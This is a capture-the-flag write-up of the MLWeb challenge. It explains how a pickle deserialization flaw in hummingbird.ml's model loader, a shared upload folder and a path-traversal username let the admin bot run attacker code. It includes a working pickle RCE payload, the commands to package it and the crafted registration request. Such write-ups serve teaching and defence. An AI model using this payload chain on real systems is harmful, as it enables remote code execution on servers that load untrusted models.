MLWeb | Jorian Woltjer

This interesting challenge only had 13 solves at the end of the event, and I managed to get the first blood 🩸! The goal was very clear from the beginning, but most of my time was spent on one small part until it finally clicked.

The Challenge

We got full source code and even a docker setup for this challenge, making it easy to test locally. When visiting the web page we can log in and register for an account to access the dashboard:

Dashboard of MLWeb after registering showing a few sidebar options

Some interesting functionality is present here, like uploading and managing files, changing your profile and reporting a profile to a bot.

On the /profile page we can view our username and register date, as well as another button labelled 'Visit My Profile'. After clicking it and waiting a few seconds we are brought to /profile/2 with a message saying "Bot successfully reported", so it is likely the bot just visited our profile. We can check this in the code:

# routes/routes_user.py
@bp_user.route('/profile/visit')
@login_required
def visit_profile():
    user_id = int(request.args.get('user_id', session['user_id']))
    visit_url(f"/profile/{user_id}")

    flash("Bot successfully reported", "success")
    return redirect(url_for('bp_user.view_profile', user_id=user_id))

# utils/bot.py
def visit_url(path):
    driver = webdriver.Firefox()

    driver.get(BASE_URL + "/login")
    sleep(0.5)

    username_field = driver.find_element(By.NAME, "username")
    username_field.send_keys("admin")
    password_field = driver.find_element(By.NAME, "password")
    password_field.send_keys(Config.ADMIN_PASSWORD)
    login_button = driver.find_element(By.ID, "loginBtn")
    login_button.click()
    
    sleep(0.5)
    driver.get(BASE_URL + path)

    sleep(3)
    driver.quit()

Every time we press this button the admin will log into their account and visit the profile we give it. Note that the user_id variable is parsed into an int, meaning we cannot provide an arbitrary path here.
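To convince ourselves that the int() call really blocks path tricks, here is a minimal sketch of the same parsing step outside of Flask. The helper name parse_user_id and the candidate values are made up for illustration; in the real route an uncaught ValueError would simply abort the request before the bot is started.

```python
def parse_user_id(raw):
    """Mimic the int(...) call in visit_profile(); hypothetical helper name."""
    try:
        return int(raw)
    except ValueError:
        # Anything that is not a plain integer never reaches visit_url()
        return None

# Illustrative inputs: two valid IDs and two path traversal attempts
candidates = ["2", " 2 ", "../model/load/1", "2/../../model/load/1"]
results = {raw: parse_user_id(raw) for raw in candidates}

for raw, parsed in results.items():
    print(repr(raw), "->", parsed)
```

Only values that Python accepts as an integer survive, so the path the bot visits always has the form /profile/<number>.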

The view that is loaded for the admin looks like this:

{% include "./partials/head.html" %}
<body id="page-top">
    <div id="wrapper">
        {% include "./partials/sidebar.html" %}
        <div id="content-wrapper" class="d-flex flex-column">
            <div id="content">
                <div class="container-fluid">
                    <div class="container mt-5">
                        {% include "./partials/flash.html" %}
                        <div class="card">
                            <div class="card-body">
                                <h5 class="card-title">Profile #{{ user.id }}</h5>
                                <div class="form-group mt-5">
                                    <label>Username: <strong>{{ user.username }}</strong></label>
                                </div>
                                <div class="form-group">
                                    <label id="statusLabel">Status: Loading...</label>
                                </div>
                                <div class="form-group text-muted">
                                    <label>Register date: {{ user.register_date }}</label>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            {% include "./partials/bottombar.html" %}
        </div>
    </div>
    {% include "./partials/footer.html" %}
    <script>
        document.addEventListener("DOMContentLoaded", function () {
            const statusLabel = document.getElementById("statusLabel");
            
            fetch('/profile/{{ user.username }}/is_logged')
                .then(response => response.json())
                .then(data => {
                    if (data.is_logged) {
                        statusLabel.innerHTML = "Status: <strong class='text-success'>Active</strong>";
                    } else {
                        statusLabel.innerHTML = "Status: <strong class='text-danger'>Inactive</strong>";
                    }
                }
            );
        });
    </script>
</body>
</html>

Interacting with the Bot

In the template above we find no Jinja2 |safe filters, meaning that HTML is always escaped to entities and we cannot simply get Cross-Site Scripting (XSS) with our username for example. There is another context however inside the <script> tag which is interesting. Because Jinja2 templates are not context-aware, they might miss escaping some characters like ' single quotes and allow you to escape from the fetch() string and start writing your own JavaScript.

Note: During the solving of this challenge I assumed that this would be an easy XSS vector without testing it, and went off to writing a whole JavaScript payload without once seeing if I actually could have XSS. As you'll read below, always test your theories!

If single quotes were not escaped, a payload like '-alert()-' would allow evaluating JavaScript that we provide, but unfortunately when we test it we find that it correctly does escape these:

from flask import Flask, render_template_string
app = Flask(__name__)
with app.app_context():
    print(render_template_string("{{ input }}", input="'-alert()-'"))

Output: &#39;-alert()-&#39;

Too bad, these are escaped. That means we cannot break out of the JavaScript context to get XSS. One thing we still might be able to abuse later is the fact that our input finds its way into a fetch() URL path, and HTML escaping leaves characters like . / and ? untouched. Using directory traversal we can point this request to any other page that might be useful. The response doesn't do anything here, but maybe the authenticated GET request this sends can trigger something.
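A quick way to see which characters survive is to run both kinds of input through an HTML escaper. This is only a sketch: html.escape() from the standard library is used as a stand-in for Jinja2's autoescaping (an assumption, the exact entity written for a quote differs between the two), and the traversal string is a made-up example.

```python
import html

def escape_like_jinja(value):
    # html.escape() is a stdlib stand-in for Jinja2's autoescaping (assumption);
    # both rewrite & < > " and ', and leave everything else alone
    return html.escape(value, quote=True)

quote_payload = escape_like_jinja("'-alert()-'")
path_payload = escape_like_jinja("../some/other/page?")  # hypothetical traversal

print(quote_payload)  # quotes are turned into entities
print(path_payload)   # dots, slashes and the question mark pass through
```

The quote-based payload is neutralised, while the traversal string comes out byte for byte identical.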

Insecure Deserialization by Design

Another page to look at is the Uploads section, where we can upload specifically .zip files which will be stored in a shared folder, and added to the database:

@bp_user.route('/upload', methods=['GET', 'POST'])
@login_required
def upload_model():
    if request.method == 'POST':
        if 'file' not in request.files:
            flash("Please select a file to upload", "danger")
            return redirect(url_for('bp_user.upload_model'))

        # Check extension to be `.zip`
        file = request.files['file']
        if file.filename == '' or not check_allowed_extensions(file.filename):
            flash("Please use a valid file and filename", "danger")
            return redirect(url_for('bp_user.upload_model'))

        # Save file to shared folder
        filename = secure_filename(file.filename)
        file_path = os.path.join(current_app.config['UPLOAD_FOLDER'], filename)
        file.save(file_path)

        # Add path to database
        model = OptimizedModel(name=file.filename, file_path=file_path, user_id=session['user_id'])
        db.session.add(model)
        db.session.commit()
        flash("File successfully uploaded", "success")
        return redirect(url_for('bp_user.upload_model'))

    return render_template('upload.html')

These files can later be listed via /files. The files are uploaded to the path /app/uploads, which is not inside the exposed web root (only /app/src/assets is). After uploading we can only edit or delete a file, and neither action does anything particularly interesting.

When we look in the UI where it lists our files, however, we find another button called 'Load'. When we click it, an error message is displayed:

You need to be an admin to access this page.

Screenshot of file listing showing one upload with a 'Load' button

This triggers the /model/load/2 endpoint defined in the routes_admin.py file:

from hummingbird.ml import load

@bp_admin.route('/model/load/<int:model_id>', methods=['GET'])
@admin_required
def load_model(model_id):
    model = OptimizedModel.query.filter_by(id=model_id, user_id=session['user_id']).first()
    if not model:
        flash("Model not found", "danger")
        return redirect(url_for('bp_user.list_models'))

    try:
        load(model.file_path)
        flash("Model successfully loaded", "success")
    except Exception as e:
        flash("Error loading model: {}".format(e), "danger")

    return redirect(url_for('bp_user.list_models'))

This seems to load the uploaded ZIP file with hummingbird.ml.load(), but admin access is required as handled by the decorator:

def admin_required(f):
    @wraps(f)
    def decorated_function(*args, **kwargs):
        if 'user_id' not in session:
            flash("You need to be logged in to access this page.", "danger")
            return redirect(url_for('bp_auth.login', next=request.url))
        if session['user_id'] != 1:
            flash("You need to be an admin to access this page.", "danger")
            return redirect(url_for('bp_user.home'))
        return f(*args, **kwargs)
    return decorated_function

We cannot make our user_id equal to 1, so we cannot access the endpoint. Still, let's explore this idea because maybe the admin can access it for us in the future. The function in question is load() from the hummingbird.ml library for Machine Learning models. Maybe there is some dangerous behaviour that we can exploit with an arbitrary ZIP file.

In Visual Studio Code, we can make a small testing example and set a breakpoint at the load() function to follow it and see what exactly happens.

from hummingbird.ml import load

load("test.zip")  # <-- Set a breakpoint by clicking the red dot on this line

Then, we can run the debugger from the Run and Debug tab on the left, which will ask us to create a launch.json file. Here we choose the template for Python Debugger and Python File, which opens a JSON file where we can specify the options for debugging. It is important to note that by default, VS Code does not step into library code, so we have to tell it to do so by adding "justMyCode": false, because that's what we're interested in:

{
    "version": "0.2.0",
    "configurations": [
        {
            "name": "Python Debugger: Current File",
            "type": "debugpy",
            "request": "launch",
            "program": "${file}",
            "console": "integratedTerminal",
            "justMyCode": false
        }
    ]
}

Finally, with our testing Python script open, we can press the green run button in the debugger to start it. This should eventually break at the load() function and allow us to step in, and follow the whole flow while reading local variables. This first hits a function like this:

def load(location, digest=None):
    ...

    # Unzip the dir.
    zip_location = location
    if not location.endswith("zip"):
        zip_location = location + ".zip"
    else:
        location = zip_location[:-4]
    assert os.path.exists(zip_location), "Zip file {} does not exist.".format(zip_location)

    # Verify the digest if provided.
    if digest is None:
        print("Warning: No digest provided. Model integrity not verified.")
    else:
        with open(zip_location, 'rb') as file:
            new_digest = hmac.new(b'shared-key', file.read(), hashlib.sha1).hexdigest()
            if digest != new_digest:
                raise RuntimeError('Integrity check failed')

    shutil.unpack_archive(zip_location, location, format="zip")

    assert os.path.exists(location), "Model location {} does not exist.".format(location)

    # Load the model type.
    with open(os.path.join(location, constants.SAVE_LOAD_MODEL_TYPE_PATH), "r") as file:
        model_type = file.readline()

    if "torch" in model_type:
        model = PyTorchSklearnContainer.load(location, do_unzip_and_model_type_check=False, digest=digest)
    elif "onnx" in model_type:
        model = ONNXSklearnContainer.load(location, do_unzip_and_model_type_check=False, digest=digest)
    elif "tvm" in model_type:
        model = TVMSklearnContainer.load(location, do_unzip_and_model_type_check=False, digest=digest)
    else:
        shutil.rmtree(location)
        raise RuntimeError("Model type {} not recognized.".format(model_type))

Using shutil.unpack_archive() our ZIP file is unpacked and written to a directory with the same name without .zip. Then, the file at constants.SAVE_LOAD_MODEL_TYPE_PATH is read from this location and its first line is compared to various model types. Because we are running in the debugger we can simply step through to where this variable is used and read its value at runtime: 'model_type.txt'.

If we include this file in our ZIP we can choose what model type to use. Let's see where any of those lead to, starting with torch:

class PyTorchSklearnContainer(SklearnContainer):
    ...
    def load(location, do_unzip_and_model_type_check=True, delete_unzip_location_folder: bool = True, digest=None):
        ...

        # Load the model type.
        with open(os.path.join(location, constants.SAVE_LOAD_MODEL_TYPE_PATH), "r") as file:
            model_type = file.readline()

        # Check the versions of the modules used when saving the model.
        if os.path.exists(os.path.join(location, constants.SAVE_LOAD_MODEL_CONFIGURATION_PATH)):
            with open(os.path.join(location, constants.SAVE_LOAD_MODEL_CONFIGURATION_PATH), "r") as file:
                configuration = file.readlines()
            check_dumped_versions(configuration, hummingbird, torch)
        else:
            warnings.warn(
                "Cannot find the configuration file with versions. You are likely trying to load a model saved with an old version of Hummingbird."
            )

        if model_type == "torch.jit":
            # This is a torch.jit model
            model = torch.jit.load(os.path.join(location, constants.SAVE_LOAD_TORCH_JIT_PATH))
            with open(os.path.join(location, "container.pkl"), "rb") as file:
                container = pickle.load(file)
            container._model = model
        elif model_type == "torch":
            # This is a pytorch  model
            with open(os.path.join(location, constants.SAVE_LOAD_TORCH_JIT_PATH), "rb") as file:
                container = pickle.load(file)
        else:
            if delete_unzip_location_folder:
                shutil.rmtree(location)
            raise RuntimeError("Model type {} not recognized".format(model_type))

It loads the model type from the same file again, and compares it to "torch.jit" or "torch", then Bingo! It loads our file with pickle.load(), an infamous serialization library that is vulnerable to insecure deserialization if untrusted data is loaded. Stepping through until this bit, we find that constants.SAVE_LOAD_TORCH_JIT_PATH is equal to 'deploy_model.zip'.

If we write a pickle Remote Code Execution payload in that location it should load and execute the code. Let's create a simple script that does this:

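import os
import pickle

class RCE:
    def __reduce__(self):
        # pickle calls os.system("id") when this object is deserialized
        return (os.system, ("id",))

rce = RCE()
data = pickle.dumps(rce)

# Create the staging directory if it does not exist yet
os.makedirs("rce", exist_ok=True)
with open("rce/deploy_model.zip", "wb") as f:
    f.write(data)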

We will prepare this in a directory called rce/ and must include a file named 'model_type.txt' with exactly the content torch, not even a newline:

mkdir -p rce
echo -n 'torch' > rce/model_type.txt
(cd rce/ && zip -r - .) > rce.zip
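The same archive can also be put together in a single Python script, which makes it easy to double-check the layout before uploading anything. This is a sketch that builds the ZIP in memory with the standard zipfile module; the two file names are the ones found while debugging, and build_archive is just a helper name chosen here.

```python
import io
import os
import pickle
import zipfile

class RCE:
    def __reduce__(self):
        # Same harmless proof-of-concept command as in the script above
        return (os.system, ("id",))

def build_archive():
    """Return the bytes of a ZIP with the two files load() looks for."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        archive.writestr("model_type.txt", "torch")  # no trailing newline
        archive.writestr("deploy_model.zip", pickle.dumps(RCE()))
    return buffer.getvalue()

archive_bytes = build_archive()

# Read the archive back to verify its layout (the pickle is never loaded here)
with zipfile.ZipFile(io.BytesIO(archive_bytes)) as archive:
    names = sorted(archive.namelist())
    model_type = archive.read("model_type.txt")

print(names, model_type)
```

Writing archive_bytes to rce.zip should give a file equivalent to the one produced by the shell commands.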

If we now load rce.zip with our test script, we see the output of the 'id' command!

Warning: No digest provided. Model integrity not verified.
/home/user/.local/lib/python3.8/site-packages/hummingbird/ml/containers/sklearn/pytorch_containers.py:157: UserWarning: Cannot find the configuration file with versions. You are likely trying to load a model saved with an old version of Hummingbird.
  warnings.warn(
uid=1001(user) gid=1001(user) groups=1001(user)

We successfully crafted a ZIP file that when loaded, will run arbitrary commands on the server. Now we still need to figure out how exactly to trigger it.

Note: For some reason the highly unsafe pickle module has almost become the de facto standard for sharing Machine Learning models, so these kinds of load functions are often vulnerable to insecure deserialization.
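If you ever want to look inside a pickle without running it, the standard pickletools module can walk the opcode stream. The sketch below inspects the same kind of payload as above; it only parses the bytes and never calls pickle.load(). Protocol 4 is pinned here so the opcode names are predictable.

```python
import os
import pickle
import pickletools

class RCE:
    def __reduce__(self):
        return (os.system, ("id",))

payload = pickle.dumps(RCE(), protocol=4)

# genops() only parses the opcode stream; nothing is imported or called
operations = list(pickletools.genops(payload))
opcodes = [opcode.name for opcode, arg, pos in operations]
strings = [arg for opcode, arg, pos in operations if isinstance(arg, str)]

print(opcodes)
print(strings)
```

A REDUCE opcode next to strings naming a function like system is a strong hint that loading the file will call that function.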

Triggering the Admin

One idea is to upload our ZIP to the application, and then use the bot to view our profile and fetch the load URL with the fetch() path traversal we found earlier. There is one problem with this though: the /model/load endpoint only allows loading a model owned by you:

@bp_admin.route('/model/load/<int:model_id>', methods=['GET'])
@admin_required
def load_model(model_id):
    # Notice the `user_id=` filter here
    model = OptimizedModel.query.filter_by(id=model_id, user_id=session['user_id']).first()
    if not model:
        flash("Model not found", "danger")
        return redirect(url_for('bp_user.list_models'))
    ...

This screws up our plan, because how would we get our model on the admin's account? With Cross-Site Scripting we could potentially make the admin upload a model and then tell it to load it. But we don't have an XSS vulnerability, and it does not seem like one is possible on any other page.
There aren't many other interesting pages we can fetch either, because uploading a file requires a POST request while the fetch() call in the template does a GET request. We cannot get the admin to upload our malicious file to their account.

This took me a long time to find, but after logging in as the Administrator on my local docker instance I noticed there is one default file in the list of the admin as an example:

Administrator dashboard showing example_mode.zip in the list of files

This file can be loaded, and it seems like it will be the only file we can load. Now here comes the trick: All files are uploaded in the same shared folder, so why not overwrite example_mode.zip with our malicious payload, and then load it!
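The reason this works is that the destination path only depends on the filename, not on who uploads it. Here is a minimal sketch of that collision using a temporary directory; save_upload is a hypothetical stand-in for the save step in upload_model(), and example.zip is a placeholder name.

```python
import os
import tempfile

def save_upload(upload_folder, filename, data):
    """Hypothetical stand-in for the save step in upload_model()."""
    # Only the filename decides the destination; the uploading user does not
    file_path = os.path.join(upload_folder, os.path.basename(filename))
    with open(file_path, "wb") as handle:
        handle.write(data)
    return file_path

with tempfile.TemporaryDirectory() as upload_folder:
    # First "user" stores a file, second "user" reuses the same name
    admin_path = save_upload(upload_folder, "example.zip", b"admin model")
    attacker_path = save_upload(upload_folder, "example.zip", b"attacker payload")
    same_path = admin_path == attacker_path
    with open(admin_path, "rb") as handle:
        final_content = handle.read()

print(same_path, final_content)
```

The database row of the first uploader still points at the same path, but the bytes behind it now belong to the second upload.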

This way the upload happens from our own account, which we are allowed to do, while the admin's database entry still points to the same file path that we just overwrote. We rename our local rce.zip to example_mode.zip and make the payload more useful by extracting the flag instead of just running 'id':

import pickle

class RCE:
    def __reduce__(self):
        import os
        return (os.system, ("cp /app/flag* /app/assets/flag.txt",))

rce = RCE()
data = pickle.dumps(rce)

with open("rce/deploy_model.zip", "wb") as f:
    f.write(data)

After zipping this again and giving it the name example_mode.zip, we can upload it through the UI like normal. This says 'File successfully uploaded'.

Then, we need to force the admin user to load the example model stored at ID=1. This is easy with our fetch() vulnerability from earlier:

document.addEventListener("DOMContentLoaded", function () {
    const statusLabel = document.getElementById("statusLabel");
    
    fetch('/profile/{{ user.username }}/is_logged')
    ...

If a username is set to ../model/load/1?, the ../ cancels out the leading /profile/ segment and the trailing /is_logged ends up in the query string, where it is ignored. The request therefore goes to /model/load/1. We will register an account like this:

POST /register HTTP/1.1
Host: localhost:5000
Content-Length: 43
Content-Type: application/x-www-form-urlencoded

username=../model/load/1?&password=anything
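To double-check where the fetch() call ends up for such a username, we can resolve the URL the same way a browser would. This sketch uses urljoin() from the standard library as an approximation of browser URL resolution (an assumption), and the page URL with profile ID 2 is only illustrative.

```python
from urllib.parse import urljoin, urlsplit

def resolve_fetch_url(page_url, username):
    # Same string the template builds for fetch()
    fetch_argument = f"/profile/{username}/is_logged"
    return urljoin(page_url, fetch_argument)

# Illustrative page URL; the real profile ID depends on the registered account
page_url = "http://localhost:5000/profile/2"

normal = urlsplit(resolve_fetch_url(page_url, "alice"))
malicious = urlsplit(resolve_fetch_url(page_url, "../model/load/1?"))

print(normal.path, normal.query)
print(malicious.path, malicious.query)
```

For a regular username the path stays under /profile/, while the crafted one resolves to the admin-only load endpoint with /is_logged pushed into the query string.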

Then the final step is to trigger the admin to visit this profile, by doing /profile/visit. After this responds with 'Bot successfully reported' we should find the flag extracted at /static/flag.txt!
GCC{0d4y_1n_d353r14l1z4710n_4r3_n07_7h47_h4rd_70_f1nd}